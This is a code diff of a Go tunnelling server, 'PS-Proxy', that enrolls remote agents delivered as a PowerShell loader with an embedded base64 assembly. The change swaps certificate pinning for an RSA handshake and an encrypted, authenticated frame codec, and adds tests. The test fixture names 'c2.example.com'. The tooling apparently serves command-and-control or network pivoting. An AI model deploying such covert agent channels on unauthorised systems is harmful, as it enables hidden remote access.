|||||||
addr := fmt.Sprintf("%s:%d", *listen, *port)
|
addr := fmt.Sprintf("%s:%d", *listen, *port)
|
||||||
log.Printf("PS-Proxy Go server starting on https://%s", addr)
|
log.Printf("PS-Proxy Go server starting on https://%s", addr)
|
||||||
log.Printf("TLS certificate: %s", *cert)
|
log.Printf("TLS certificate: %s", *cert)
|
||||||
log.Printf("Agent cert pin: %s", pin)
|
log.Printf("PS-Proxy identity key: %s", *identityKeyPath)
|
||||||
|
log.Printf("PS-Proxy identity public key pin: %s", identityPin)
|
||||||
log.Printf("Planned TUN target: %s routes=%s", *tun, strings.Join(routes, ","))
|
log.Printf("Planned TUN target: %s routes=%s", *tun, strings.Join(routes, ","))
|
||||||
if *redirect {
|
if *redirect {
|
||||||
log.Printf("Transparent redirect mode enabled on 127.0.0.1:%d", *redirectPort)
|
log.Printf("Transparent redirect mode enabled on 127.0.0.1:%d", *redirectPort)
|
||||||
@@ -132,12 +136,13 @@ func main() {
|
|||||||
}
|
}
|
||||||
|
|
||||||
type TunnelServer struct {
|
type TunnelServer struct {
|
||||||
store *staging.Store
|
store *staging.Store
|
||||||
mu sync.Mutex
|
identityKey *rsa.PrivateKey
|
||||||
session *AgentSession
|
mu sync.Mutex
|
||||||
nextID atomic.Uint64
|
session *AgentSession
|
||||||
dnsID atomic.Uint64
|
nextID atomic.Uint64
|
||||||
maxStreams int
|
dnsID atomic.Uint64
|
||||||
|
maxStreams int
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
|
func NewTunnelServer(store *staging.Store, maxStreams int) *TunnelServer {
|
||||||
@@ -194,13 +199,14 @@ type AgentSession struct {
|
|||||||
dnsPending map[uint64]chan []byte
|
dnsPending map[uint64]chan []byte
|
||||||
locals map[uint64]*localStream
|
locals map[uint64]*localStream
|
||||||
maxStreams int
|
maxStreams int
|
||||||
|
codec protocol.Codec
|
||||||
}
|
}
|
||||||
|
|
||||||
func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
|
func NewAgentSession(c net.Conn, br *bufio.Reader, maxStreams int) *AgentSession {
|
||||||
if maxStreams < 1 {
|
if maxStreams < 1 {
|
||||||
maxStreams = 1
|
maxStreams = 1
|
||||||
}
|
}
|
||||||
return &AgentSession{conn: c, br: br, closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
|
return &AgentSession{conn: c, br: br, codec: protocol.NewPlainCodec(br, c), closed: make(chan struct{}), pending: map[uint64]chan error{}, dnsPending: map[uint64]chan []byte{}, locals: map[uint64]*localStream{}, maxStreams: maxStreams}
|
||||||
}
|
}
|
||||||
|
|
||||||
func (a *AgentSession) Close() {
|
func (a *AgentSession) Close() {
|
||||||
@@ -227,7 +233,7 @@ func (a *AgentSession) Close() {
|
|||||||
func (a *AgentSession) send(f protocol.Frame) error {
|
func (a *AgentSession) send(f protocol.Frame) error {
|
||||||
a.sendMu.Lock()
|
a.sendMu.Lock()
|
||||||
defer a.sendMu.Unlock()
|
defer a.sendMu.Unlock()
|
||||||
return protocol.WriteFrame(a.conn, f)
|
return a.codec.WriteFrame(f)
|
||||||
}
|
}
|
||||||
|
|
||||||
func (a *AgentSession) Open(id uint64, target string) error {
|
func (a *AgentSession) Open(id uint64, target string) error {
|
||||||
@@ -280,7 +286,7 @@ func (a *AgentSession) RemoveLocal(id uint64) {
|
|||||||
func (a *AgentSession) Run() {
|
func (a *AgentSession) Run() {
|
||||||
defer a.Close()
|
defer a.Close()
|
||||||
for {
|
for {
|
||||||
f, err := protocol.ReadFrame(a.br)
|
f, err := a.codec.ReadFrame()
|
||||||
if err != nil {
|
if err != nil {
|
||||||
log.Printf("agent disconnected: %v", err)
|
log.Printf("agent disconnected: %v", err)
|
||||||
return
|
return
|
||||||
@@ -648,26 +654,30 @@ func handleTLSConn(raw net.Conn, cfg *tls.Config, mux *http.ServeMux, server *Tu
|
|||||||
}
|
}
|
||||||
|
|
||||||
func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
|
func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
|
||||||
line, err := br.ReadString('\n')
|
codec := protocol.Codec(protocol.NewPlainCodec(br, conn))
|
||||||
if err != nil {
|
if server.identityKey != nil {
|
||||||
|
secure, err := serverHandshake(conn, br, server.identityKey)
|
||||||
|
if err != nil {
|
||||||
|
log.Printf("agent secure handshake failed: %v", err)
|
||||||
|
_ = conn.Close()
|
||||||
|
return
|
||||||
|
}
|
||||||
|
codec = secure
|
||||||
|
}
|
||||||
|
f, err := codec.ReadFrame()
|
||||||
|
if err != nil || f.Type != protocol.FramePing {
|
||||||
_ = conn.Close()
|
_ = conn.Close()
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
line = strings.TrimSpace(line)
|
fields := strings.Fields(string(f.Payload))
|
||||||
const prefix = "ENROLL "
|
if len(fields) == 0 || fields[0] != "ENROLL" || len(fields) < 2 {
|
||||||
if !strings.HasPrefix(line, prefix) {
|
|
||||||
_ = conn.Close()
|
_ = conn.Close()
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
fields := strings.Fields(strings.TrimPrefix(line, prefix))
|
enrollToken := fields[1]
|
||||||
if len(fields) == 0 {
|
|
||||||
_ = conn.Close()
|
|
||||||
return
|
|
||||||
}
|
|
||||||
enrollToken := fields[0]
|
|
||||||
reconnectToken := ""
|
reconnectToken := ""
|
||||||
if len(fields) > 1 {
|
if len(fields) > 2 {
|
||||||
reconnectToken = fields[1]
|
reconnectToken = fields[2]
|
||||||
}
|
}
|
||||||
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
|
if err := server.store.Authenticate(enrollToken, reconnectToken); err != nil {
|
||||||
log.Printf("agent enrollment failed: %v", err)
|
log.Printf("agent enrollment failed: %v", err)
|
||||||
@@ -675,6 +685,7 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
a := NewAgentSession(conn, br, server.maxStreams)
|
a := NewAgentSession(conn, br, server.maxStreams)
|
||||||
|
a.codec = codec
|
||||||
server.SetSession(a)
|
server.SetSession(a)
|
||||||
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
|
log.Printf("agent enrolled and connected from %s", conn.RemoteAddr())
|
||||||
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
|
_ = a.send(protocol.Frame{Type: protocol.FramePong, Payload: []byte("OK")})
|
||||||
@@ -682,6 +693,55 @@ func handleAgent(conn net.Conn, br *bufio.Reader, server *TunnelServer) {
|
|||||||
server.ClearSession(a)
|
server.ClearSession(a)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func serverHandshake(conn net.Conn, br *bufio.Reader, key *rsa.PrivateKey) (*protocol.SecureCodec, error) {
|
||||||
|
line, err := br.ReadString('\n')
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
parts := strings.Fields(strings.TrimSpace(line))
|
||||||
|
if len(parts) != 3 || parts[0] != "HELLO" {
|
||||||
|
return nil, errors.New("expected HELLO")
|
||||||
|
}
|
||||||
|
encSecret, err := base64.RawURLEncoding.DecodeString(parts[1])
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
clientNonce, err := base64.RawURLEncoding.DecodeString(parts[2])
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
if len(clientNonce) != 32 {
|
||||||
|
return nil, errors.New("invalid client nonce")
|
||||||
|
}
|
||||||
|
secret, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, key, encSecret, []byte("PS-Proxy PSP1 session"))
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
if len(secret) != 32 {
|
||||||
|
return nil, errors.New("invalid session secret")
|
||||||
|
}
|
||||||
|
serverNonce := make([]byte, 32)
|
||||||
|
if _, err := rand.Read(serverNonce); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
pubDER, err := x509.MarshalPKIXPublicKey(&key.PublicKey)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
mac := hmac.New(sha256.New, secret)
|
||||||
|
mac.Write([]byte(protocol.Magic))
|
||||||
|
mac.Write([]byte(line))
|
||||||
|
mac.Write(serverNonce)
|
||||||
|
mac.Write(clientNonce)
|
||||||
|
mac.Write(pubDER)
|
||||||
|
proof := mac.Sum(nil)
|
||||||
|
resp := "PROOF " + base64.RawURLEncoding.EncodeToString(serverNonce) + " " + base64.RawURLEncoding.EncodeToString(proof) + "\n"
|
||||||
|
if _, err := io.WriteString(conn, resp); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
return protocol.NewSecureCodec(br, conn, secret)
|
||||||
|
}
|
||||||
|
|
||||||
type singleListener struct {
|
type singleListener struct {
|
||||||
conn net.Conn
|
conn net.Conn
|
||||||
done chan struct{}
|
done chan struct{}
|
||||||
@@ -716,28 +776,45 @@ type multiFlag []string
|
|||||||
func (m *multiFlag) String() string { return strings.Join(*m, ",") }
|
func (m *multiFlag) String() string { return strings.Join(*m, ",") }
|
||||||
func (m *multiFlag) Set(v string) error { *m = append(*m, v); return nil }
|
func (m *multiFlag) Set(v string) error { *m = append(*m, v); return nil }
|
||||||
|
|
||||||
func normalizeCertPin(pin string) (string, error) {
|
func loadOrCreateIdentityKey(path string) (*rsa.PrivateKey, error) {
|
||||||
normalized := strings.ToLower(strings.ReplaceAll(strings.ReplaceAll(strings.TrimSpace(pin), ":", ""), " ", ""))
|
if b, err := os.ReadFile(path); err == nil {
|
||||||
if len(normalized) != 64 {
|
block, _ := pem.Decode(b)
|
||||||
return "", fmt.Errorf("pin must be 64 hex characters after removing colons/spaces")
|
if block == nil {
|
||||||
|
return nil, fmt.Errorf("no PEM block in %s", path)
|
||||||
|
}
|
||||||
|
if k, err := x509.ParsePKCS1PrivateKey(block.Bytes); err == nil {
|
||||||
|
return k, nil
|
||||||
|
}
|
||||||
|
parsed, err := x509.ParsePKCS8PrivateKey(block.Bytes)
|
||||||
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
k, ok := parsed.(*rsa.PrivateKey)
|
||||||
|
if !ok {
|
||||||
|
return nil, errors.New("identity key is not RSA")
|
||||||
|
}
|
||||||
|
return k, nil
|
||||||
|
} else if !os.IsNotExist(err) {
|
||||||
|
return nil, err
|
||||||
}
|
}
|
||||||
if _, err := hex.DecodeString(normalized); err != nil {
|
k, err := rsa.GenerateKey(rand.Reader, 3072)
|
||||||
return "", fmt.Errorf("pin must be hex: %w", err)
|
if err != nil {
|
||||||
|
return nil, err
|
||||||
}
|
}
|
||||||
return normalized, nil
|
b := pem.EncodeToMemory(&pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(k)})
|
||||||
|
if err := os.WriteFile(path, b, 0600); err != nil {
|
||||||
|
return nil, err
|
||||||
|
}
|
||||||
|
return k, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func certPin(path string) (string, error) {
|
func publicKeyStaging(k *rsa.PrivateKey) (string, string, error) {
|
||||||
pemBytes, err := os.ReadFile(path)
|
der, err := x509.MarshalPKIXPublicKey(&k.PublicKey)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return "", err
|
return "", "", err
|
||||||
}
|
}
|
||||||
block, _ := pem.Decode(pemBytes)
|
sum := sha256.Sum256(der)
|
||||||
if block == nil || block.Type != "CERTIFICATE" {
|
return base64.StdEncoding.EncodeToString(der), hex.EncodeToString(sum[:]), nil
|
||||||
return "", fmt.Errorf("no PEM certificate found in %s", path)
|
|
||||||
}
|
|
||||||
sum := sha256.Sum256(block.Bytes)
|
|
||||||
return hex.EncodeToString(sum[:]), nil
|
|
||||||
}
|
}
|
||||||
func publicURL(domain string, port int) string {
|
func publicURL(domain string, port int) string {
|
||||||
if port == 443 {
|
if port == 443 {
|
||||||
|
|||||||
@@ -2,7 +2,14 @@ package main
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"bufio"
|
"bufio"
|
||||||
|
"crypto/hmac"
|
||||||
|
"crypto/rand"
|
||||||
|
"crypto/rsa"
|
||||||
|
"crypto/sha256"
|
||||||
|
"crypto/x509"
|
||||||
|
"encoding/base64"
|
||||||
"net"
|
"net"
|
||||||
|
"strings"
|
||||||
"testing"
|
"testing"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
@@ -124,23 +131,67 @@ func TestSingleListenerAcceptReturnsEOFAfterFirstConn(t *testing.T) {
|
|||||||
t.Fatal("second accept should return EOF")
|
t.Fatal("second accept should return EOF")
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
func TestServerSecureHandshakeEncryptedFrame(t *testing.T) {
|
||||||
func TestNormalizeCertPin(t *testing.T) {
|
key, err := rsa.GenerateKey(rand.Reader, 3072)
|
||||||
pin := "BC:1D:96:47:91:A5:11:B4:95:26:EC:F2:25:35:37:F6:E6:17:0A:1A:19:4F:45:65:9E:88:0C:A7:A4:3D:6C:02"
|
|
||||||
got, err := normalizeCertPin(pin)
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("normalize pin failed: %v", err)
|
t.Fatal(err)
|
||||||
}
|
}
|
||||||
want := "bc1d964791a511b49526ecf2253537f6e6170a1a194f45659e880ca7a43d6c02"
|
store := staging.NewStore(time.Minute)
|
||||||
if got != want {
|
sess, err := store.Create("c2.example.com", 443, "server-key", "")
|
||||||
t.Fatalf("unexpected normalized pin: %s", got)
|
if err != nil {
|
||||||
}
|
t.Fatal(err)
|
||||||
}
|
}
|
||||||
|
server := NewTunnelServer(store, 2)
|
||||||
func TestNormalizeCertPinRejectsInvalidPins(t *testing.T) {
|
server.identityKey = key
|
||||||
for _, pin := range []string{"abc", "zz1d964791a511b49526ecf2253537f6e6170a1a194f45659e880ca7a43d6c02"} {
|
srv, cli := net.Pipe()
|
||||||
if _, err := normalizeCertPin(pin); err == nil {
|
defer cli.Close()
|
||||||
t.Fatalf("expected invalid pin %q to fail", pin)
|
go handleAgent(srv, bufio.NewReader(srv), server)
|
||||||
}
|
if _, err := cli.Write([]byte("HELLO ")); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
secret := []byte("0123456789abcdef0123456789abcdef")
|
||||||
|
nonce := []byte("abcdef0123456789abcdef0123456789")
|
||||||
|
enc, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, &key.PublicKey, secret, []byte("PS-Proxy PSP1 session"))
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
helloTail := base64.RawURLEncoding.EncodeToString(enc) + " " + base64.RawURLEncoding.EncodeToString(nonce) + "\n"
|
||||||
|
if _, err := cli.Write([]byte(helloTail)); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
br := bufio.NewReader(cli)
|
||||||
|
line, err := br.ReadString('\n')
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
parts := strings.Fields(strings.TrimSpace(line))
|
||||||
|
if len(parts) != 3 || parts[0] != "PROOF" {
|
||||||
|
t.Fatalf("bad proof line: %q", line)
|
||||||
|
}
|
||||||
|
serverNonce, _ := base64.RawURLEncoding.DecodeString(parts[1])
|
||||||
|
proof, _ := base64.RawURLEncoding.DecodeString(parts[2])
|
||||||
|
pubDER, _ := x509.MarshalPKIXPublicKey(&key.PublicKey)
|
||||||
|
mac := hmac.New(sha256.New, secret)
|
||||||
|
mac.Write([]byte(protocol.Magic))
|
||||||
|
mac.Write([]byte("HELLO " + helloTail))
|
||||||
|
mac.Write(serverNonce)
|
||||||
|
mac.Write(nonce)
|
||||||
|
mac.Write(pubDER)
|
||||||
|
if !hmac.Equal(proof, mac.Sum(nil)) {
|
||||||
|
t.Fatal("proof mismatch")
|
||||||
|
}
|
||||||
|
codec, err := protocol.NewSecureCodec(br, cli, secret)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if err := codec.WriteFrame(protocol.Frame{Type: protocol.FramePing, Payload: []byte("ENROLL " + sess.EnrollToken + " " + sess.ReconnectToken)}); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
f, err := codec.ReadFrame()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
if f.Type != protocol.FramePong || string(f.Payload) != "OK" {
|
||||||
|
t.Fatalf("unexpected ack: %#v", f)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -0,0 +1,159 @@
|
|||||||
|
package protocol
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"crypto/aes"
|
||||||
|
"crypto/cipher"
|
||||||
|
"crypto/hmac"
|
||||||
|
"crypto/rand"
|
||||||
|
"crypto/sha256"
|
||||||
|
"encoding/binary"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
)
|
||||||
|
|
||||||
|
const secureMaxRecord = MaxPayload + 1024
|
||||||
|
|
||||||
|
type Codec interface {
|
||||||
|
ReadFrame() (Frame, error)
|
||||||
|
WriteFrame(Frame) error
|
||||||
|
}
|
||||||
|
|
||||||
|
type PlainCodec struct {
|
||||||
|
R io.Reader
|
||||||
|
W io.Writer
|
||||||
|
}
|
||||||
|
|
||||||
|
func NewPlainCodec(r io.Reader, w io.Writer) *PlainCodec { return &PlainCodec{R: r, W: w} }
|
||||||
|
func (c *PlainCodec) ReadFrame() (Frame, error) { return ReadFrame(c.R) }
|
||||||
|
func (c *PlainCodec) WriteFrame(f Frame) error { return WriteFrame(c.W, f) }
|
||||||
|
|
||||||
|
type SecureCodec struct {
|
||||||
|
r io.Reader
|
||||||
|
w io.Writer
|
||||||
|
encKey, macKey []byte
|
||||||
|
sendSeq, recvSeq uint64
|
||||||
|
}
|
||||||
|
|
||||||
|
func NewSecureCodec(r io.Reader, w io.Writer, secret []byte) (*SecureCodec, error) {
|
||||||
|
if len(secret) != 32 {
|
||||||
|
return nil, fmt.Errorf("secure codec requires 32-byte secret")
|
||||||
|
}
|
||||||
|
e := sha256.Sum256(append(append([]byte(nil), secret...), []byte("psproxy aes-cbc")...))
|
||||||
|
m := sha256.Sum256(append(append([]byte(nil), secret...), []byte("psproxy hmac")...))
|
||||||
|
return &SecureCodec{r: r, w: w, encKey: e[:], macKey: m[:]}, nil
|
||||||
|
}
|
||||||
|
func (c *SecureCodec) WriteFrame(f Frame) error {
|
||||||
|
var plain bytes.Buffer
|
||||||
|
var seq [8]byte
|
||||||
|
binary.BigEndian.PutUint64(seq[:], c.sendSeq)
|
||||||
|
plain.Write(seq[:])
|
||||||
|
if err := WriteFrame(&plain, f); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
padded := pkcs7Pad(plain.Bytes(), aes.BlockSize)
|
||||||
|
block, err := aes.NewCipher(c.encKey)
|
||||||
|
if err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
iv := make([]byte, aes.BlockSize)
|
||||||
|
if _, err := rand.Read(iv); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
ct := make([]byte, len(padded))
|
||||||
|
cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
|
||||||
|
rec := append(iv, ct...)
|
||||||
|
mac := hmac.New(sha256.New, c.macKey)
|
||||||
|
mac.Write(seq[:])
|
||||||
|
mac.Write(rec)
|
||||||
|
tag := mac.Sum(nil)
|
||||||
|
if len(rec)+len(tag) > secureMaxRecord {
|
||||||
|
return fmt.Errorf("secure record too large")
|
||||||
|
}
|
||||||
|
var lenb [4]byte
|
||||||
|
binary.BigEndian.PutUint32(lenb[:], uint32(len(rec)+len(tag)))
|
||||||
|
if _, err := c.w.Write(lenb[:]); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if _, err := c.w.Write(rec); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
if _, err := c.w.Write(tag); err != nil {
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
c.sendSeq++
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
func (c *SecureCodec) ReadFrame() (Frame, error) {
|
||||||
|
var lenb [4]byte
|
||||||
|
if _, err := io.ReadFull(c.r, lenb[:]); err != nil {
|
||||||
|
return Frame{}, err
|
||||||
|
}
|
||||||
|
n := binary.BigEndian.Uint32(lenb[:])
|
||||||
|
if n < aes.BlockSize+sha256.Size || n > secureMaxRecord {
|
||||||
|
return Frame{}, fmt.Errorf("invalid secure record length: %d", n)
|
||||||
|
}
|
||||||
|
rec := make([]byte, n)
|
||||||
|
if _, err := io.ReadFull(c.r, rec); err != nil {
|
||||||
|
return Frame{}, err
|
||||||
|
}
|
||||||
|
body, tag := rec[:n-sha256.Size], rec[n-sha256.Size:]
|
||||||
|
var seq [8]byte
|
||||||
|
binary.BigEndian.PutUint64(seq[:], c.recvSeq)
|
||||||
|
mac := hmac.New(sha256.New, c.macKey)
|
||||||
|
mac.Write(seq[:])
|
||||||
|
mac.Write(body)
|
||||||
|
if !hmac.Equal(tag, mac.Sum(nil)) {
|
||||||
|
return Frame{}, errors.New("secure frame authentication failed")
|
||||||
|
}
|
||||||
|
if (len(body)-aes.BlockSize)%aes.BlockSize != 0 {
|
||||||
|
return Frame{}, errors.New("invalid secure ciphertext length")
|
||||||
|
}
|
||||||
|
block, err := aes.NewCipher(c.encKey)
|
||||||
|
if err != nil {
|
||||||
|
return Frame{}, err
|
||||||
|
}
|
||||||
|
pt := make([]byte, len(body)-aes.BlockSize)
|
||||||
|
cipher.NewCBCDecrypter(block, body[:aes.BlockSize]).CryptBlocks(pt, body[aes.BlockSize:])
|
||||||
|
pt, err = pkcs7Unpad(pt, aes.BlockSize)
|
||||||
|
if err != nil {
|
||||||
|
return Frame{}, err
|
||||||
|
}
|
||||||
|
if len(pt) < 8 {
|
||||||
|
return Frame{}, errors.New("secure plaintext too short")
|
||||||
|
}
|
||||||
|
got := binary.BigEndian.Uint64(pt[:8])
|
||||||
|
if got != c.recvSeq {
|
||||||
|
return Frame{}, fmt.Errorf("secure frame sequence mismatch: got %d want %d", got, c.recvSeq)
|
||||||
|
}
|
||||||
|
f, err := ReadFrame(bytes.NewReader(pt[8:]))
|
||||||
|
if err != nil {
|
||||||
|
return Frame{}, err
|
||||||
|
}
|
||||||
|
c.recvSeq++
|
||||||
|
return f, nil
|
||||||
|
}
|
||||||
|
func pkcs7Pad(b []byte, block int) []byte {
|
||||||
|
pad := block - len(b)%block
|
||||||
|
out := append([]byte(nil), b...)
|
||||||
|
for i := 0; i < pad; i++ {
|
||||||
|
out = append(out, byte(pad))
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
func pkcs7Unpad(b []byte, block int) ([]byte, error) {
|
||||||
|
if len(b) == 0 || len(b)%block != 0 {
|
||||||
|
return nil, errors.New("invalid padding length")
|
||||||
|
}
|
||||||
|
p := int(b[len(b)-1])
|
||||||
|
if p == 0 || p > block || p > len(b) {
|
||||||
|
return nil, errors.New("invalid padding")
|
||||||
|
}
|
||||||
|
for _, v := range b[len(b)-p:] {
|
||||||
|
if int(v) != p {
|
||||||
|
return nil, errors.New("invalid padding")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return b[:len(b)-p], nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,50 @@
|
|||||||
|
package protocol
|
||||||
|
|
||||||
|
import (
|
||||||
|
"net"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func TestSecureCodecRoundTrip(t *testing.T) {
|
||||||
|
c1, c2 := net.Pipe()
|
||||||
|
defer c1.Close()
|
||||||
|
defer c2.Close()
|
||||||
|
secret := []byte("0123456789abcdef0123456789abcdef")
|
||||||
|
a, _ := NewSecureCodec(c1, c1, secret)
|
||||||
|
b, _ := NewSecureCodec(c2, c2, secret)
|
||||||
|
want := Frame{StreamID: 7, Type: FrameData, Payload: []byte("hello")}
|
||||||
|
go func() { _ = a.WriteFrame(want) }()
|
||||||
|
got, err := b.ReadFrame()
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("read: %v", err)
|
||||||
|
}
|
||||||
|
if got.StreamID != want.StreamID || got.Type != want.Type || string(got.Payload) != string(want.Payload) {
|
||||||
|
t.Fatalf("got %#v want %#v", got, want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSecureCodecTamperRejection(t *testing.T) {
|
||||||
|
c1, c2 := net.Pipe()
|
||||||
|
defer c1.Close()
|
||||||
|
defer c2.Close()
|
||||||
|
secret := []byte("0123456789abcdef0123456789abcdef")
|
||||||
|
a, _ := NewSecureCodec(c1, c1, secret)
|
||||||
|
go func() { _ = a.WriteFrame(Frame{Type: FrameData, Payload: []byte("hello")}) }()
|
||||||
|
lenb := make([]byte, 4)
|
||||||
|
if _, err := c2.Read(lenb); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
rec := make([]byte, int(lenb[0])<<24|int(lenb[1])<<16|int(lenb[2])<<8|int(lenb[3]))
|
||||||
|
if _, err := c2.Read(rec); err != nil {
|
||||||
|
t.Fatal(err)
|
||||||
|
}
|
||||||
|
rec[len(rec)-1] ^= 0xff
|
||||||
|
server, client := net.Pipe()
|
||||||
|
defer server.Close()
|
||||||
|
defer client.Close()
|
||||||
|
go func() { client.Write(lenb); client.Write(rec) }()
|
||||||
|
b, _ := NewSecureCodec(server, server, secret)
|
||||||
|
if _, err := b.ReadFrame(); err == nil {
|
||||||
|
t.Fatal("tampered frame should be rejected")
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -14,7 +14,7 @@ type Session struct {
|
|||||||
ID string
|
ID string
|
||||||
Server string
|
Server string
|
||||||
Port int
|
Port int
|
||||||
CertPin string
|
ServerKey string
|
||||||
EnrollToken string
|
EnrollToken string
|
||||||
ReconnectToken string
|
ReconnectToken string
|
||||||
DNSTarget string
|
DNSTarget string
|
||||||
@@ -43,7 +43,7 @@ func NewSecret(n int) (string, error) {
|
|||||||
return base64.RawURLEncoding.EncodeToString(b), nil
|
return base64.RawURLEncoding.EncodeToString(b), nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Session, error) {
|
func (s *Store) Create(server string, port int, serverKey, dnsTarget string) (*Session, error) {
|
||||||
id, err := NewSecret(18)
|
id, err := NewSecret(18)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
@@ -56,7 +56,7 @@ func (s *Store) Create(server string, port int, certPin, dnsTarget string) (*Ses
|
|||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
sess := &Session{ID: id, Server: server, Port: port, CertPin: certPin, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
|
sess := &Session{ID: id, Server: server, Port: port, ServerKey: serverKey, EnrollToken: tok, ReconnectToken: reconnect, DNSTarget: dnsTarget, ExpiresAt: time.Now().Add(s.ttl)}
|
||||||
s.mu.Lock()
|
s.mu.Lock()
|
||||||
defer s.mu.Unlock()
|
defer s.mu.Unlock()
|
||||||
s.sessions[id] = sess
|
s.sessions[id] = sess
|
||||||
@@ -113,7 +113,7 @@ type AgentTemplateData struct {
|
|||||||
AssemblyB64 string
|
AssemblyB64 string
|
||||||
Server string
|
Server string
|
||||||
Port int
|
Port int
|
||||||
CertPin string
|
ServerKey string
|
||||||
EnrollToken string
|
EnrollToken string
|
||||||
ReconnectToken string
|
ReconnectToken string
|
||||||
DNSTarget string
|
DNSTarget string
|
||||||
@@ -129,6 +129,6 @@ func AgentHandler(store *Store, tmpl *template.Template, assemblyB64 string) htt
|
|||||||
}
|
}
|
||||||
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
|
w.Header().Set("Content-Type", "text/plain; charset=utf-8")
|
||||||
w.Header().Set("Cache-Control", "no-store")
|
w.Header().Set("Cache-Control", "no-store")
|
||||||
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, CertPin: sess.CertPin, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
|
_ = tmpl.Execute(w, AgentTemplateData{AssemblyB64: assemblyB64, Server: sess.Server, Port: sess.Port, ServerKey: sess.ServerKey, EnrollToken: sess.EnrollToken, ReconnectToken: sess.ReconnectToken, DNSTarget: sess.DNSTarget})
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -21,7 +21,7 @@ $template = Get-Content (Join-Path $RepoRoot "agent/loader/agent.ps1.tmpl") -Raw
|
|||||||
$template = $template.Replace('{{.AssemblyB64}}', $b64)
|
$template = $template.Replace('{{.AssemblyB64}}', $b64)
|
||||||
$template = $template.Replace('{{.Server}}', '__SERVER__')
|
$template = $template.Replace('{{.Server}}', '__SERVER__')
|
||||||
$template = $template.Replace('{{.Port}}', '443')
|
$template = $template.Replace('{{.Port}}', '443')
|
||||||
$template = $template.Replace('{{.CertPin}}', '__CERT_PIN__')
|
$template = $template.Replace('{{.ServerKey}}', '__SERVER_KEY__')
|
||||||
$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
|
